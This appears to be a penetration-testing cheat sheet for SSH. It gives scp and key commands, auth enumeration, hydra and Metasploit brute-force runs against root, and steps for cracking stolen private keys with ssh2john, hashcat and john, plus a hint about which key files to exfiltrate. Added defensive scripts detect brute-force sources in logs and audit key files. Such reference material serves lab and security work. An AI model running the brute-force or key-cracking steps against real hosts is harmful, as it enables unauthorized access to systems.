22 - SSH
Usage
ssh user1@10.10.10.10 -p 2222 'ls /home/user1/'

# Local to remote (upload)
scp file1 user@172.16.10.10:/tmp/file1
# Remote to local (download)
scp user@172.16.10.10:/tmp/file1 ./file1

If scp fails with errors like the ones below, try -O. Since OpenSSH 9.0 scp transfers over SFTP by default, which breaks when the remote login shell prints anything for non-interactive sessions; -O falls back to the legacy scp protocol:

$ scp -i id_rsa ./authorized_keys bob@sorc:/home/bob/.ssh/authorized_keys
scp: Received message too long 1094927173
scp: Ensure the remote shell produces no output for non-interactive sessions.
$ scp -O -i id_rsa ./authorized_keys bob@sorc:/home/bob/.ssh/authorized_keys

# Generate key pair
$ ssh-keygen -t rsa -f ~/.ssh/id_rsa -N ''
# Add public key to authorized keys
$ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
# Read private key
$ cat .ssh/id_rsa

Auth Methods
Supported authentication methods.
nmap -p22 --script=ssh-auth-methods <IP>

Audit
$ ssh-audit 192.168.0.24
# general
(gen) banner: SSH-1.99-OpenSSH_2.9p2
(gen) protocol SSH1 enabled
(gen) software: OpenSSH 2.9p2
(gen) compatibility: OpenSSH 2.5.0-6.6, Dropbear SSH 0.47-0.52
(gen) compression: enabled (zlib)
<SNIP>

Brute Force
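The tools in this section leave a distinctive trail on the target, and the hydra and Metasploit runs below are exactly the activity a defender tunes alerts for. As an added example that is not part of the original page, this shell snippet counts sshd "Failed password" lines per source address and reports the sources that reach a threshold. The log lines are constructed samples in the syslog format OpenSSH writes to /var/log/auth.log (Debian) or /var/log/secure (RHEL); the host name and the addresses are made up, and the function names are the example's own.

```sh
#!/bin/sh
# Added example (not from the original page): count failed SSH password logins
# per source address and flag sources at or above a threshold.
# Constructed sample lines; host name and addresses are invented.
SAMPLE_AUTH_LOG='Mar  3 10:01:12 target sshd[4021]: Failed password for root from 192.168.0.50 port 51000 ssh2
Mar  3 10:01:13 target sshd[4021]: Failed password for root from 192.168.0.50 port 51002 ssh2
Mar  3 10:01:13 target sshd[4023]: Failed password for invalid user admin from 192.168.0.50 port 51004 ssh2
Mar  3 10:01:14 target sshd[4025]: Failed password for root from 192.168.0.50 port 51006 ssh2
Mar  3 10:01:14 target sshd[4027]: Failed password for root from 192.168.0.50 port 51008 ssh2
Mar  3 10:02:40 target sshd[4101]: Accepted publickey for alice from 10.0.0.7 port 40210 ssh2: ED25519 SHA256:constructed
Mar  3 10:05:02 target sshd[4150]: Failed password for bob from 10.0.0.9 port 40300 ssh2
Mar  3 10:05:30 target sshd[4152]: Accepted password for bob from 10.0.0.9 port 40302 ssh2'

# ssh_failed_by_source LOGFILE
# Prints "<count> <address>" for every source with at least one failed
# password attempt, highest count first. The address is located as the field
# after "from" because the "invalid user" prefix shifts fixed column positions.
# The process label is sshd[pid] on most systems and sshd-session[pid] since
# OpenSSH 9.8, so the pattern accepts both.
ssh_failed_by_source() {
    awk '/sshd(-session)?\[[0-9]+\]: Failed password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") { count[$(i + 1)]++; break }
         }
         END { for (ip in count) print count[ip], ip }' "$1" | sort -rn
}

# ssh_bruteforce_sources LOGFILE THRESHOLD
# Prints only the addresses whose failure count reaches THRESHOLD.
ssh_bruteforce_sources() {
    ssh_failed_by_source "$1" | awk -v t="$2" '($1 + 0) >= (t + 0) { print $2 }'
}

# Stand-alone run against the constructed sample.
demo_bruteforce_detection() {
    log=$(mktemp)
    printf '%s\n' "$SAMPLE_AUTH_LOG" > "$log"
    echo "failed password attempts per source:"
    ssh_failed_by_source "$log"
    echo "sources with 5 or more failures:"
    ssh_bruteforce_sources "$log" 5
    rm -f "$log"
}
demo_bruteforce_detection
```

Pointed at a real auth log, the same two functions give a per-source view of how loud a password-guessing run is; a threshold of a handful of failures in a short window is the usual starting point for an alert.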
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.0.24:22 -t 4

$ msfconsole -q
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
PASS_FILE => /usr/share/wordlists/metasploit/unix_passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.57.134
RHOSTS => 192.168.57.134

nmap -p 22 --script ssh-brute potato

PPK to PEM
Convert a PuTTY user key file (.ppk) to an SSH .pem file.
# Converting PPK to PEM
sudo puttygen key.ppk -O private-openssh -o key.pem
# Assigning the appropriate permissions
sudo chmod 600 key.pem
# Confirming permissions
ls -l key.pem
# Using public key authentication
ssh root@10.10.11.227 -i key.pem

For an example of the above process check Keeper.
Private Keys
# converting the private key into a hashcat-friendly format
$ ssh2john id_rsa > ssh.hash
$ cat ssh.hash
id_rsa:$sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e737<SNIP>
# removing the 'id_rsa' username
$ nano ssh.hash
$ cat ssh.hash
$sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e737<SNIP>

$ hashcat -h | grep -i "ssh"
<SNIP>
22921 | RSA/DSA/EC/OpenSSH Private Keys ($6$) | Private Key
# might not work
$ hashcat -m 22921 ssh.hash ssh.passwords
# this will probably work
$ john --wordlist=ssh.passwords ssh.hash

Key Types
SSH supports multiple key types, each with its own default filename, so when trying to exfiltrate one don't just search for id_rsa!

Key Type     Private Key File     Public Key File
RSA          ~/.ssh/id_rsa        ~/.ssh/id_rsa.pub
ECDSA        ~/.ssh/id_ecdsa      ~/.ssh/id_ecdsa.pub
ED25519      ~/.ssh/id_ed25519    ~/.ssh/id_ed25519.pub
DSA (old)    ~/.ssh/id_dsa        ~/.ssh/id_dsa.pub

ECDSA and ED25519 are newer and generally faster/smaller than RSA. ED25519 is currently the recommended default for many systems (ssh-keygen defaults to it now). RSA is still widely supported, but 4096-bit keys are now preferred to meet current security guidance.
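The default file names in the table are also what a defender should inventory on their own hosts. As an added example that is not part of the original page, this shell snippet audits a directory for those four names and reports the two conditions that make a copied key usable without the cracking step from the Private Keys section: a file mode wider than 600 and a key stored without a passphrase. For the openssh-key-v1 format it reads the cipher name from the decoded binary header, where "none" means unencrypted; for PEM it looks for the "ENCRYPTED" marker. The sample key files it builds are constructed headers with filler bodies, not real keys, and the function names and directory layout are the example's own.

```sh
#!/bin/sh
# Added example (not from the original page): audit a directory for the default
# SSH private-key filenames and report files readable by others (mode wider
# than 600) and keys stored with no passphrase. Handles both encodings OpenSSH
# writes: PEM ("BEGIN RSA/EC/DSA PRIVATE KEY", encrypted ones carry
# "Proc-Type: 4,ENCRYPTED") and openssh-key-v1 ("BEGIN OPENSSH PRIVATE KEY",
# whose header names the cipher, "none" when unencrypted).
SSH_KEY_NAMES="id_rsa id_ecdsa id_ed25519 id_dsa"

# key_is_encrypted FILE -> exit 0 if the key is passphrase-protected, 1 if not
# (an unparseable openssh-key-v1 header is also reported as unprotected).
key_is_encrypted() {
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1"; then
        # Decoded body: "openssh-key-v1\0" (15 bytes), uint32 length, cipher name.
        # Skip the 19 header bytes and take the first printable token.
        cipher=$(sed -n '/^-----BEGIN/,/^-----END/{/^-----/!p;}' "$1" | base64 -d 2>/dev/null |
                 tail -c +20 | head -c 32 | LC_ALL=C tr -c 'a-z0-9@.-' ' ' | awk '{ print $1 }')
        [ -n "$cipher" ] && [ "$cipher" != "none" ]
    else
        grep -q 'ENCRYPTED' "$1"   # PEM Proc-Type header or PKCS#8 "ENCRYPTED PRIVATE KEY"
    fi
}

# audit_ssh_keys DIR -> one finding per line, "FILE: issue"; prints nothing when clean
audit_ssh_keys() {
    for name in $SSH_KEY_NAMES; do
        f="$1/$name"
        [ -f "$f" ] || continue
        mode=$(stat -c '%a' "$f")
        case "$mode" in
            600|400) ;;
            *) echo "$f: mode $mode (expected 600)" ;;
        esac
        key_is_encrypted "$f" || echo "$f: no passphrase"
    done
}

# --- constructed sample key files: real header layout, filler body, not usable keys ---
u32_str() {   # uint32 big-endian length (strings shorter than 256 bytes) followed by the string
    printf '\000\000\000'
    printf "$(printf '\\%03o' "${#1}")"
    printf '%s' "$1"
}
make_sample_key_v1() {   # make_sample_key_v1 FILE CIPHER   ("none" = no passphrase)
    if [ "$2" = none ]; then kdf=none; else kdf=bcrypt; fi
    {
        echo '-----BEGIN OPENSSH PRIVATE KEY-----'
        { printf 'openssh-key-v1\000'; u32_str "$2"; u32_str "$kdf"; printf '\000\000\000\000'
          printf 'constructed-sample-not-a-real-key'; } | base64
        echo '-----END OPENSSH PRIVATE KEY-----'
    } > "$1"
}
make_sample_key_pem() {   # make_sample_key_pem FILE encrypted|plain
    {
        echo '-----BEGIN RSA PRIVATE KEY-----'
        if [ "$2" = encrypted ]; then
            printf 'Proc-Type: 4,ENCRYPTED\nDEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n'
        fi
        echo 'Y29uc3RydWN0ZWQtc2FtcGxlLW5vdC1hLXJlYWwta2V5'
        echo '-----END RSA PRIVATE KEY-----'
    } > "$1"
}

# Stand-alone run: two protected keys with correct modes, two findings-worthy ones.
demo_key_audit() {
    dir=$(mktemp -d)
    make_sample_key_v1 "$dir/id_ed25519" none;       chmod 644 "$dir/id_ed25519"
    make_sample_key_v1 "$dir/id_ecdsa"   aes256-ctr; chmod 600 "$dir/id_ecdsa"
    make_sample_key_pem "$dir/id_rsa"    plain;      chmod 600 "$dir/id_rsa"
    make_sample_key_pem "$dir/id_dsa"    encrypted;  chmod 600 "$dir/id_dsa"
    audit_ssh_keys "$dir"
    rm -rf "$dir"
}
demo_key_audit
```

Run audit_ssh_keys against a real ~/.ssh to check your own hosts. A key that passes both checks still has to survive the wordlist attack in the Private Keys section, so the passphrase check only says a passphrase exists, not that it is strong.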